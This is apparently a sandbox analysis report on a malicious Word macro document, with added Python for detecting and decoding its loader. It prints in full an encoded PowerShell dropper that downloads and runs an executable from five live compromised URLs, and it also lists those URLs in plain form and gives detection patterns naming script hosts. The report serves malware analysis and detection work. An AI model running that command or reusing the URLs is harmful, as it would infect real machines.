Analysis

  • max time kernel: 122s
  • max time network: 126s
  • platform: windows7_x64
  • resource: win7-20240611-en
  • resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted: 13-06-2024 23:32

General

  • Target: a71e4a779943aaa028af9996b614d9d9_JaffaCakes118.doc
  • Size: 131KB
  • MD5: a71e4a779943aaa028af9996b614d9d9
  • SHA1: da8b16fa034801d3eb11fb92741cb3bdfa63b608
  • SHA256: 4121261a90ceec70d342e21f322d96ec9ef7c64c06534c2dcc2f2ec69ed9bf8e
  • SHA512: 17b3f638920ab70e825cdbfac8b4ea1d995ff6a741ddf69027df2e55e0e3a4b077760048f9aa89c7a108142a7a214725fe73f111ecb88eb84fd13321ebdd2775
  • SSDEEP: 3072:H77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q7KO8owNx+EIyj:H77HUUUUUUUUUUUUUUUUUUUT52Vq8o4l

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated URLs (exe.dropper):
    http://en.efesusstone.com/wp-content/uploads/EMBVtaupO/
    http://amazingtraps.com/wp-includes/KZYJuTjJp/
    http://bramastudio.com/wp-includes/mvBAPWMFc/
    http://revistadaybynight.com.br/sac/i2ofs9_mpi8a73dgz-4/
    http://boss-mobile.co.uk/wp-content/u6cyu6_m3atjj2-51/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
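
The first signature above is the parent/child relationship an analyst would want to alert on in their own telemetry: WINWORD.EXE (PID 2204) starting powershell.exe with -nop -e. The Python below is an added example, not part of the sandbox report: it evaluates constructed process-creation events shaped like Sysmon event ID 1 (ParentImage, Image, CommandLine) against that rule and against the encoded-command and stealth switches. The event list, the application and switch lists, and the harmless stand-in payload are this example's assumptions; only the WINWORD.EXE and splwow64.exe command lines are taken from the process tree below.

```python
"""Flag an Office application spawning a script host, and an encoded
PowerShell command line, over constructed Sysmon-style process events.

Added example, not code from the sandbox report or from the malware. Event
shapes, allow/deny lists and the stand-in payload are this example's choices.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "visio.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                "bitsadmin.exe", "msiexec.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# followed by the base64 blob. The lookbehind keeps "-ep bypass" from matching.
ENCODED_ARG = re.compile(r"(?i)(?<![\w-])-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Switches that suppress profile, prompt or window: normal in maldoc loaders, rare in admin use.
STEALTH_SWITCH = re.compile(
    r"(?i)(?<![\w-])-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden"
    r"|ep\s+bypass|executionpolicy\s+bypass)")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_utf16_b64(arg: str):
    """-EncodedCommand is base64 over UTF-16LE; anything else is not a real payload."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def evaluate(event: dict) -> list:
    """Return the list of rule names the event trips (empty list = clean)."""
    findings = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        findings.append(f"office_spawns_script_host:{parent}->{child}")
    if child in POWERSHELL:
        if STEALTH_SWITCH.search(cmd):
            findings.append("powershell_stealth_switches")
        m = ENCODED_ARG.search(cmd)
        if m:
            findings.append("powershell_encoded_command")
            decoded = decode_utf16_b64(m.group(1))
            if decoded and re.search(r"(?i)downloadfile|downloadstring|https?://|iex\b|invoke-expression", decoded):
                findings.append("encoded_payload_is_downloader")
    return findings


WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stand-in for the report's payload: same WebClient.DownloadFile shape, inert target.
STAND_IN = base64.b64encode(
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x/','x.exe')".encode("utf-16-le")
).decode()

# Constructed events; the first two command lines are the ones shown in the process tree.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": WINWORD,
     "CommandLine": f'"{WINWORD}" /n "C:\\Users\\Admin\\AppData\\Local\\Temp\\a71e4a779943aaa028af9996b614d9d9_JaffaCakes118.doc"'},
    {"ParentImage": WINWORD, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ParentImage": WINWORD, "Image": PS,
     "CommandLine": f"powershell -nop -e {STAND_IN}"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
]


def triage(events: list) -> list:
    return [(basename(e["Image"]), evaluate(e)) for e in events]


if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(f"{image:16} {hits or 'clean'}")
```

The printing helper splwow64.exe spawned by WINWORD.EXE in the tree is deliberately in the sample set: it is a legitimate Office child, and a rule that keys only on "Word spawned something" would page on it. Only the Word-to-PowerShell event trips all four checks.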

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a71e4a779943aaa028af9996b614d9d9_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -e JABiAEEAegBXADAAegA5AEIAPQAnAEIATAB3AEsAUABCAGsAaAAnADsAJAB3AE0AdgBHAEMAagAgAD0AIAAnADEANgAyACcAOwAkAEQAYQBxAGkAdAAyAGgAUgA9ACcAWQB1ADAAVgBHADgANgAnADsAJABPADcANgBCADYAbwBkAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcATQB2AEcAQwBqACsAJwAuAGUAeABlACcAOwAkAEQANQBfAHEAOQBvAD0AJwB6AHQAaABmAFoAVwBHAGMAJwA7ACQASwBFAFQAagBCAFYAegAyAD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMATABgAEkARQBgAE4AdAA7ACQARABuAHMANABxAFQAPQAnAGgAdAB0AHAAOgAvAC8AZQBuAC4AZQBmAGUAcwB1AHMAcwB0AG8AbgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEUATQBCAFYAdABhAHUAcABPAC8AQABoAHQAdABwADoALwAvAGEAbQBhAHoAaQBuAGcAdAByAGEAcABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBLAFoAWQBKAHUAVABqAEoAcAAvAEAAaAB0AHQAcAA6AC8ALwBiAHIAYQBtAGEAcwB0AHUAZABpAG8ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AdgBCAEEAUABXAE0ARgBjAC8AQABoAHQAdABwADoALwAvAHIAZQB2AGkAcwB0AGEAZABhAHkAYgB5AG4AaQBnAGgAdAAuAGMAbwBtAC4AYgByAC8AcwBhAGMALwBpADIAbwBmAHMAOQBfAG0AcABpADgAYQA3ADMAZABnAHoALQA0AC8AQABoAHQAdABwADoALwAvAGIAbwBzAHMALQBtAG8AYgBpAGwAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1ADYAYwB5AHUANgBfAG0AMwBhAHQAagBqADIALQA1ADEALwAnAC4AcwBwAEwAaQB0ACgAJwBAACcAKQA7ACQAdABRADAAYQB1AGgAPQAnAFgAegB6AEoARQBxAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAQgBQAFoAQgBJAHoAMwAgAGkAbgAgACQARABuAHMANABxAFQAKQB7AHQAcgB5AHsAJABLAEUAVABqAEIAVgB6ADIALgBEAE8AVwBuAGwATwBBAGQAZgBpAGwARQAoACQAbABCAFAAWgBCAEkAegAzACwAIAAkAE8ANwA2AEIANgBvAGQAQQApADsAJABxAEUAdQB0ADIASwBEAGsAPQAnAHMARABYADQANABmAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABPADcANgBCADYAbwBkAEEAKQAuAGwARQBuAEcAdABoACAALQBnAGUAIAAyADAANwAwADEAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AHMAVABBAFIAdAAoACQATwA3ADYAQgA2AG8AZABBACkAOwAkAGgASgBkAFAAWQBMAD0AJwBwAHAAMgA2AFYAWQBSAFgAJwA7AGIAcgBlAGEAawA7ACQAQgBHADcAMgBNADcAagA9ACcAdgA3AG8AUQBvADUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaQBtAGYAVQBwAGEAPQAnAHUAdgA4AHMAMABtAGoAbwAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1628
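
The five URLs listed under Malware Config come from the -e argument of the powershell.exe command line above. The Python below is an added example, not part of the sandbox report or of the malware: it decodes that argument (base64 over UTF-16LE), strips the loader's backtick and string-concatenation obfuscation, and pulls out the download list, the drop path and the size check the loader applies before executing. The base64 is copied from the process tree; the function names, the regular expressions and the %USERPROFILE% rendering of $env:userprofile are this example's own assumptions.

```python
"""Recover the second stage from the powershell.exe command line in the report.

Added example, not code from the sandbox report or from the malware. The
deobfuscation rules are heuristics for this loader style, not a PowerShell parser.
"""
import base64
import re
from typing import Optional

# Argument of "powershell -nop -e ..." exactly as shown in the Processes section.
ENCODED_COMMAND = "JABiAEEAegBXADAAegA5AEIAPQAnAEIATAB3AEsAUABCAGsAaAAnADsAJAB3AE0AdgBHAEMAagAgAD0AIAAnADEANgAyACcAOwAkAEQAYQBxAGkAdAAyAGgAUgA9ACcAWQB1ADAAVgBHADgANgAnADsAJABPADcANgBCADYAbwBkAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcATQB2AEcAQwBqACsAJwAuAGUAeABlACcAOwAkAEQANQBfAHEAOQBvAD0AJwB6AHQAaABmAFoAVwBHAGMAJwA7ACQASwBFAFQAagBCAFYAegAyAD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMATABgAEkARQBgAE4AdAA7ACQARABuAHMANABxAFQAPQAnAGgAdAB0AHAAOgAvAC8AZQBuAC4AZQBmAGUAcwB1AHMAcwB0AG8AbgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEUATQBCAFYAdABhAHUAcABPAC8AQABoAHQAdABwADoALwAvAGEAbQBhAHoAaQBuAGcAdAByAGEAcABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBLAFoAWQBKAHUAVABqAEoAcAAvAEAAaAB0AHQAcAA6AC8ALwBiAHIAYQBtAGEAcwB0AHUAZABpAG8ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AdgBCAEEAUABXAE0ARgBjAC8AQABoAHQAdABwADoALwAvAHIAZQB2AGkAcwB0AGEAZABhAHkAYgB5AG4AaQBnAGgAdAAuAGMAbwBtAC4AYgByAC8AcwBhAGMALwBpADIAbwBmAHMAOQBfAG0AcABpADgAYQA3ADMAZABnAHoALQA0AC8AQABoAHQAdABwADoALwAvAGIAbwBzAHMALQBtAG8AYgBpAGwAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1ADYAYwB5AHUANgBfAG0AMwBhAHQAagBqADIALQA1ADEALwAnAC4AcwBwAEwAaQB0ACgAJwBAACcAKQA7ACQAdABRADAAYQB1AGgAPQAnAFgAegB6AEoARQBxAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAQgBQAFoAQgBJAHoAMwAgAGkAbgAgACQARABuAHMANABxAFQAKQB7AHQAcgB5AHsAJABLAEUAVABqAEIAVgB6ADIALgBEAE8AVwBuAGwATwBBAGQAZgBpAGwARQAoACQAbABCAFAAWgBCAEkAegAzACwAIAAkAE8ANwA2AEIANgBvAGQAQQApADsAJABxAEUAdQB0ADIASwBEAGsAPQAnAHMARABYADQANABmAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABPADcANgBCADYAbwBkAEEAKQAuAGwARQBuAEcAdABoACAALQBnAGUAIAAyADAANwAwADEAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AHMAVABBAFIAdAAoACQATwA3ADYAQgA2AG8AZABBACkAOwAkAGgASgBkAFAAWQBMAD0AJwBwAHAAMgA2AFYAWQBSAFgAJwA7AGIAcgBlAGEAawA7ACQAQgBHADcAMgBNADcAagA9ACcAdgA3AG8AUQBvADUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaQBtAGYAVQBwAGEAPQAnAHUAdgA4AHMAMABtAGoAbwAnAA=="

# Characters a backtick legitimately escapes in PowerShell; a backtick before any
# other character (WebCL`IE`Nt) only serves to break signature matching.
_REAL_ESCAPES = set("0abefnrtuv`\"'$ \n")
URL_RE = re.compile(r"https?://[^\s'\"@]+")  # '@' is the loader's own list separator


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Undo stray backticks, 'a'+'b' concatenation and the &('cmd') call wrapper."""
    kept = []
    for i, ch in enumerate(script):
        if ch == "`" and i + 1 < len(script) and script[i + 1] not in _REAL_ESCAPES:
            continue
        kept.append(ch)
    s = "".join(kept)
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        s, n = concat.subn(r"'\1\2'", s)
        if n == 0:
            break
    return re.sub(r"&\('([^']*)'\)", r"\1", s)


def extract_urls(script: str) -> list:
    return URL_RE.findall(script)


def resolve_drop_path(script: str) -> Optional[str]:
    """Rebuild $env:userprofile+'\\'+$var+'.exe' from the script's own string constants."""
    consts = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'\s*;", script))
    m = re.search(r"\$\w+\s*=\s*(\$env:userprofile[^;]*);", script, re.IGNORECASE)
    if not m:
        return None
    parts = []
    for tok in (t.strip() for t in m.group(1).split("+")):
        if tok.lower() == "$env:userprofile":
            parts.append("%USERPROFILE%")  # assumption: render the env var Windows-style
        elif len(tok) >= 2 and tok[0] == tok[-1] == "'":
            parts.append(tok[1:-1])
        elif tok.startswith("$"):
            parts.append(consts.get(tok[1:], tok))
        else:
            parts.append(tok)
    return "".join(parts)


def size_threshold(script: str) -> Optional[int]:
    """The loader runs the file only if Get-Item .Length -ge N, so a short error
    page served by a cleaned-up site is skipped and the next URL is tried."""
    m = re.search(r"-ge\s+(\d+)", script)
    return int(m.group(1)) if m else None


def analyze(b64: str) -> dict:
    script = deobfuscate(decode_encoded_command(b64))
    return {
        "script": script,
        "urls": extract_urls(script),
        "drop_path": resolve_drop_path(script),
        "min_size": size_threshold(script),
        "downloader": ".downloadfile(" in script.lower(),
    }


if __name__ == "__main__":
    result = analyze(ENCODED_COMMAND)
    print(result["script"])
    print("drop path:", result["drop_path"], "min size:", result["min_size"])
    print("\n".join(result["urls"]))
```

The size check is worth noting when hunting on the sandbox's own network capture: a URL that answered with a small 404 or parked page still shows up as a request, but the loader moves on to the next one, so the sample can exhaust all five without a successful execution.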

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D56BFB6.wmf
      Filesize: 700B
      MD5: 3a257837b942678196c5aea8272aae07
      SHA1: 0cf02ec5be2ea25fa69df1ae0b96ccd90adb253e
      SHA256: 3772a992482091e4d612e2dcda785722ba5c4d010df6bb2abbe03ce505a5b3f1
      SHA512: 5fbf2bd6f2bc4f10c854775350e5d5921dc9a5ea75fbb969f18ce5fa39b165b5700dc441b103e7274a5759413e6edbb20da81e35fbf147b5978311c852d2635e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E05E2D68.wmf
      Filesize: 700B
      MD5: 61a2105e5afbf4035dc75bb5cadcb16a
      SHA1: b7ecd36fbf6c1c206c30cfca0fb3a62bf5934116
      SHA256: ba54eb44f8eddf108456f6b8d3d53ff2753c36abf4444eec4ce0d1c91814845e
      SHA512: ad8cab61bff9b9fdba1ecc7675803d189478a20536e10bc879978e8e959a7e6f77a787ddc63c3c33881d8dbd7e41b2aab483a9bed90d0f1fa0db4faa27c66251

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5135D34.wmf
      Filesize: 700B
      MD5: 69952ac92961952331e52d29801f4cb0
      SHA1: e2e9e3b3dc1f86e983d24fb1054420e93639f9d9
      SHA256: 8d48eb3838d179084dd6bf21eee61c665aa05d49b2c2e0d4600c700bea92203d
      SHA512: bba8641d258439647d162a56cbc621d345e0e9ef777a7838bae35589eb90561c0f019fb45b250a8a0e3a7ec7f0ff1f37d8c817df2a8f239957c2b074907543f8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize: 20KB
      MD5: 8dace97aa9a06d5b434b71028f40c4a7
      SHA1: d420389658b5d047116e6bc51ff2c253fa134c18
      SHA256: 9317665d8cb2228cfd30bad41be699e6dea27db88c1573a2354b482c643a8cd9
      SHA512: f87fee5a22792b2aa6c0711d20a53a348bed7719381ada9b7fd4e3aef9f4e59cb0ff46011a6b769bb3729e6f27c3c53d80bf547237c970c6350a9fdaef5c6bb8

    • memory/1628-48-0x0000000002420000-0x0000000002428000-memory.dmp
      Filesize: 32KB

    • memory/1628-47-0x000000001B2C0000-0x000000001B5A2000-memory.dmp
      Filesize: 2.9MB

    • memory/2204-41-0x0000000005E20000-0x0000000005F20000-memory.dmp
      Filesize: 1024KB

    • memory/2204-38-0x0000000005E20000-0x0000000005F20000-memory.dmp
      Filesize: 1024KB

    • memory/2204-7-0x0000000006230000-0x0000000006330000-memory.dmp
      Filesize: 1024KB

    • memory/2204-40-0x0000000005E20000-0x0000000005F20000-memory.dmp
      Filesize: 1024KB

    • memory/2204-39-0x0000000005E20000-0x0000000005F20000-memory.dmp
      Filesize: 1024KB

    • memory/2204-2-0x00000000710BD000-0x00000000710C8000-memory.dmp
      Filesize: 44KB

    • memory/2204-0-0x000000002F111000-0x000000002F112000-memory.dmp
      Filesize: 4KB

    • memory/2204-59-0x00000000710BD000-0x00000000710C8000-memory.dmp
      Filesize: 44KB

    • memory/2204-60-0x0000000006230000-0x0000000006330000-memory.dmp
      Filesize: 1024KB

    • memory/2204-61-0x0000000005E20000-0x0000000005F20000-memory.dmp
      Filesize: 1024KB

    • memory/2204-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize: 64KB

    • memory/2204-77-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize: 64KB

    • memory/2204-90-0x00000000710BD000-0x00000000710C8000-memory.dmp
      Filesize: 44KB